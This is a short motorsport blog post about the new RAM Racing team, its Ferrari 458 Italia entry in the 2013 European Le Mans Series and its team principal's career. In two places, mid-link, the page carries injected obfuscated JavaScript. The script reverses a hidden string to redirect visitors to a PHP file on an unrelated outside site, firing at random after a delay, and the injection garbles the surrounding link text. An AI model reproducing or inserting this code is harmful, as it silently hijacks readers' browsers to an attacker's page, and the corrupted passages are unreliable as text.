In motorsport’s wide-ranging echelons, new teams have a habit of crawling out the woodwork almost every week. Power to them and “give it your best chaps” crankandpiston says, since its always great to see enthusiasts showing their support for the sport they love.
One new team to have poked its nose above the parapet is the newly established RAM Racing, and there are a couple of reasons we sat up and took notice. The first – as you’ve probably already guessed – is the team’s Ferrari 458 Italia, with which it will be contesting the 2013 European Le Mans Series in the GT category. They also plan on showing up for the $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/2013-dubai-24hrs-the-wheels-in-motion/” target=”_blank”>2013 Dubai 24hrs too.
Most of our desktops are already plastered with this very, very handsome-looking beast, and we can’t wait to see the pRAMcing horse captured in motion through the Porsche Curves at $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/tags/le_mans/” target=”_blank”>Le Mans and dicing through Becketts at Silverstone. Especially at night, since the ‘RAM’ logo across both the bonnet and roof has received layers of glow-in-the-dark paint.
The second is the team personnel sheet, which includes Team Principal Dan Shufflebottom. Not only has Dan spent time on the British Touring Car Championship circuit, he also found time to help Richard Burns secure the World Rally Championship with Subaru in 2001 and help get the BAR Honda team up and running during its first tentative steps into Formula One. As cribsheets go, that’s pretty impressive.
